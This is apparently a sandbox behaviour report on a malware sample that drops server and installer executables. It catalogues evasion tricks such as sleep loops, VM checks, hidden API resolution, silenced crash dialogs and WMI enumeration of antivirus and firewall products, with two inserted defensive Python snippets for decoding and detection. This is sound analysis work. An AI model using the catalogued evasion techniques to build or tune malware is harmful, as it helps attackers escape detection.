Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 834
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 627
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_es2.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kcms.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
Source: C:\Windows\System32\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
Found evasive API chain (date check)
Source: C:\Windows\InstallDir\Server.exe | Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Windows\System32\svchost.exe | Evasive API call chain: GetSystemTime,DecisionNodes (graph_5-9485)
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Local\Temp\server.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_3-10192)
Source: C:\Windows\InstallDir\Server.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\server.exe | API coverage: 8.6 %
Source: C:\Windows\System32\svchost.exe | API coverage: 3.3 %
Source: C:\Program Files\Internet Explorer\iexplore.exe | API coverage: 2.3 %
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | API coverage: 9.9 %
Source: C:\Windows\InstallDir\Server.exe | API coverage: 3.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 3692 | Thread sleep time: -80000s >= -60000s
Source: C:\Windows\System32\svchost.exe TID: 1716 | Thread sleep time: -360000s >= -60000s
Source: C:\Windows\explorer.exe TID: 3796 | Thread sleep time: -120000s >= -60000s
Source: C:\Windows\explorer.exe TID: 3828 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 3908 | Thread sleep time: -180000s >= -60000s
Source: C:\Windows\explorer.exe TID: 2624 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 3936 | Thread sleep time: -180000s >= -60000s
Source: C:\Windows\explorer.exe TID: 2444 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 3952 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 4016 | Thread sleep time: -60000s >= -60000s
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe TID: 2176 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\cscript.exe TID: 2668 | Thread sleep time: -240000s >= -60000s
Source: C:\Windows\System32\cscript.exe TID: 2616 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 2380 | Thread sleep time: -120000s >= -60000s
Source: C:\Windows\explorer.exe TID: 1324 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\cscript.exe TID: 2456 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\cscript.exe TID: 2340 | Thread sleep time: -60000s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_1_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 6_2_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00405FAC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_2_00C835B0 FindFirstFileW,CloseHandle
Source: C:\Windows\InstallDir\Server.exe | Code function: 15_1_00C835B0 FindFirstFileW,CloseHandle
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: server.exe, svchost.exe, iexplore.exe, explorer.exe, Server.exe | Binary or memory string: trhgtehgfsgrfgtrwegtre
Source: Server.exe | Binary or memory string: VBoxService.exe
Program exit points
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9809)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9813)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9827)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9967)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9801)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9966)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9820)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9821)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9847)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9815)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9818)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9790)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9337)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9934)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9791)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9795)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9779)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9824)
Source: C:\Users\user\AppData\Local\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-9825)
Source: C:\Windows\System32\svchost.exe | API call chain: ExitProcess graph end node (graph_5-9449)
Source: C:\Program Files\Internet Explorer\iexplore.exe | API call chain: ExitProcess graph end node (graph_6-9697)
Source: C:\Program Files\Internet Explorer\iexplore.exe | API call chain: ExitProcess graph end node (graph_6-9696)
Source: C:\Program Files\Internet Explorer\iexplore.exe | API call chain: ExitProcess graph end node (graph_6-9664)
Source: C:\Windows\InstallDir\Server.exe | API call chain: ExitProcess graph end node (21 identical entries, no graph node id recorded)

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00447930 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,12_2_00447930
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_0045C73C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,12_2_0045C73C
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_0045CE6C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,12_2_0045CE6C
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_0045CF30 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,12_2_0045CF30
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_0041DD98 IsIconic,GetWindowPlacement,GetWindowRect,12_2_0041DD98
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00448300 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,12_2_00448300
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00459200 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,12_2_00459200
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_00447028 IsIconic,GetCapture,12_2_00447028
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C87E20 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00C87E20
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\sxz.exe | Process information set: NOOPENFILEERRORBOX (11 identical entries)
Source: C:\Users\user\AppData\Local\Temp\server.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX (10 identical entries)
Source: C:\Users\user\AppData\Local\Temp\server.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX (5 identical entries)
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe | Process information set: NOOPENFILEERRORBOX (5 identical entries)
Source: C:\Windows\System32\svchost.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX (5 identical entries)
Source: C:\Windows\System32\svchost.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX (1 entry)
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (12 identical entries)
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Process information set: NOOPENFILEERRORBOX (6 identical entries)
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Process information set: NOGPFAULTERRORBOX (120 identical entries)
Source: C:\Windows\InstallDir\Server.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX (11 identical entries)
Source: C:\Windows\InstallDir\Server.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX (5 identical entries)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\System32\cscript.exe | Process information set: NOOPENFILEERRORBOX (4 identical entries)
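The entries above are Joe Sandbox's rendering of the flags each process passed to SetErrorMode. The following Python decoder is an added example, not code from the report: it maps a uMode value to the flag names shown, rebuilds the value from a report detail string, and collapses lines of the form "Source: <image> ... Process information set: <flags>" into per-process counts. The bit values are the documented Win32 SEM_* constants; the sample lines are constructed here, and the parser tolerates both a " | " separator and a missing one before "Process information set:".

```python
from typing import Dict, List

# Documented Win32 SetErrorMode (SEM_*) bit values.
SEM_FLAGS = {
    0x0001: "FAILCRITICALERRORS",      # critical-error dialog suppressed; error returned to caller
    0x0002: "NOGPFAULTERRORBOX",       # Windows Error Reporting / crash dialog suppressed
    0x0004: "NOALIGNMENTFAULTEXCEPT",  # alignment faults fixed up silently
    0x8000: "NOOPENFILEERRORBOX",      # OpenFile "file not found" dialog suppressed
}
NAME_TO_BIT = {name: bit for bit, name in SEM_FLAGS.items()}
KNOWN_MASK = sum(SEM_FLAGS)


def decode_error_mode(mode: int) -> List[str]:
    """Names of the flags set in a SetErrorMode uMode value, lowest bit first.
    Bits outside the documented set are reported rather than dropped."""
    names = [name for bit, name in sorted(SEM_FLAGS.items()) if mode & bit]
    unknown = mode & ~KNOWN_MASK
    if unknown:
        names.append(f"UNKNOWN(0x{unknown:x})")
    return names


def encode_report_detail(detail: str) -> int:
    """Turn a report detail such as
    'NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX'
    back into the uMode value the process passed. A leading SEM_ is accepted."""
    mode = 0
    for token in detail.split(" and "):
        token = token.strip()
        if token.startswith("SEM_"):
            token = token[4:]
        if token not in NAME_TO_BIT:
            raise ValueError(f"unknown SetErrorMode flag: {token}")
        mode |= NAME_TO_BIT[token]
    return mode


def silences_crashes(mode: int) -> bool:
    """True when the crash dialog is suppressed, so a faulting implant
    disappears without a visible WER prompt."""
    return bool(mode & NAME_TO_BIT["NOGPFAULTERRORBOX"])


def summarize(lines: List[str]) -> Dict[str, Dict[int, int]]:
    """Collapse 'Source: <image> ... Process information set: <flags>' lines
    into {image: {mode: count}}. Works with or without a ' | ' separator
    before 'Process information set:'."""
    summary: Dict[str, Dict[int, int]] = {}
    for line in lines:
        src, sep, detail = line.partition("Process information set:")
        if not sep:
            continue
        image = src.replace("Source:", "", 1).strip(" |")
        mode = encode_report_detail(detail)
        per_image = summary.setdefault(image, {})
        per_image[mode] = per_image.get(mode, 0) + 1
    return summary


# Constructed sample lines, shaped like the entries above (one deliberately fused).
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\server.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX",
    r"Source: C:\Users\user\AppData\Local\Temp\server.exe | Process information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX",
    r"Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX",
    r"Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX",
]

if __name__ == "__main__":
    for image, modes in summarize(SAMPLE_LINES).items():
        for mode, count in modes.items():
            tag = " (crash dialog off)" if silences_crashes(mode) else ""
            print(f"{image}: uMode=0x{mode:04x} {'|'.join(decode_error_mode(mode))} x{count}{tag}")
```

NOGPFAULTERRORBOX is the flag that matters most for an analyst: with it set, a crashing implant exits without the Windows Error Reporting prompt, which is why 358saxio.exe setting it 120 times is worth noting. The same flags are also set by ordinary runtimes and installers, so by themselves they are weak evidence; the report lists them under hiding and protection rather than as a detection on their own.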

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\cscript.exe | WMI Queries: IWbemServices::ExecQuery - Select * from AntiVirusProduct
Source: C:\Windows\System32\cscript.exe | WMI Queries: IWbemServices::ExecQuery - Select * from AntiVirusProduct
Source: C:\Windows\System32\cscript.exe | WMI Queries: IWbemServices::ExecQuery - Select * from FirewallProduct
Source: C:\Windows\System32\cscript.exe | WMI Queries: IWbemServices::ExecQuery - Select * from FirewallProduct
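The four queries above are the standard way to list installed antivirus and firewall products through WMI, here issued from cscript.exe. The following detection logic is an added example and not part of the report: it scans WMI query records for security-product class names and flags those issued by a script host, which is the combination worth alerting on. The record field names, the script-host list and the extra class AntiSpywareProduct are assumptions of this example; the sample events are constructed to mirror the four entries above plus one benign inventory query.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# WMI classes that describe installed security products. AntiVirusProduct and
# FirewallProduct are the two queried in the report; AntiSpywareProduct is the
# third class of the same root\SecurityCenter2 namespace, added as an assumption.
SECURITY_PRODUCT_CLASSES = {"AntiVirusProduct", "AntiSpywareProduct", "FirewallProduct"}
_CANONICAL = {c.lower(): c for c in SECURITY_PRODUCT_CLASSES}   # WQL class names are case-insensitive

# Script hosts and other living-off-the-land binaries droppers use to run the query (assumed list).
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "powershell.exe", "mshta.exe", "wmic.exe"}

_FROM_CLASS = re.compile(r"\bfrom\s+([A-Za-z_][A-Za-z0-9_]*)", re.IGNORECASE)


@dataclass(frozen=True)
class WmiEvent:
    image: str   # full path of the process issuing the query (field name is an assumption)
    query: str   # WQL text, as the report prints it after "ExecQuery - "


@dataclass(frozen=True)
class Finding:
    image: str
    wmi_class: str
    count: int
    from_script_host: bool


def classes_in_query(query: str) -> List[str]:
    """Every class named in a FROM clause of the WQL text, as written."""
    return _FROM_CLASS.findall(query)


def detect_security_product_enum(events: List[WmiEvent]) -> List[Finding]:
    """Group security-product queries by (image, class) and mark those issued
    by a script host, which is the pairing that should raise an alert."""
    counts: Dict[Tuple[str, str], int] = {}
    for ev in events:
        for cls in classes_in_query(ev.query):
            canonical = _CANONICAL.get(cls.lower())
            if canonical is None:
                continue
            key = (ev.image, canonical)
            counts[key] = counts.get(key, 0) + 1
    findings = []
    for (image, cls), n in sorted(counts.items()):
        host = image.rsplit("\\", 1)[-1].lower()
        findings.append(Finding(image, cls, n, host in SCRIPT_HOSTS))
    return findings


# Constructed events: the four report entries plus one benign inventory query.
SAMPLE_EVENTS = [
    WmiEvent(r"C:\Windows\System32\cscript.exe", "Select * from AntiVirusProduct"),
    WmiEvent(r"C:\Windows\System32\cscript.exe", "Select * from AntiVirusProduct"),
    WmiEvent(r"C:\Windows\System32\cscript.exe", "Select * from FirewallProduct"),
    WmiEvent(r"C:\Windows\System32\cscript.exe", "Select * from FirewallProduct"),
    WmiEvent(r"C:\Windows\System32\svchost.exe", "Select * from Win32_OperatingSystem"),
]

if __name__ == "__main__":
    for f in detect_security_product_enum(SAMPLE_EVENTS):
        level = "ALERT" if f.from_script_host else "info "
        print(f"{level} {f.image} queried {f.wmi_class} x{f.count}")
```

Administrative inventory tools issue the same queries, so the class name alone is not the signal; the issuing process is. A script host such as cscript.exe, spawned during the execution of a dropped executable, asking which AV and firewall products are installed is the pattern to alert on.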

Language, Device and Operating System Detection: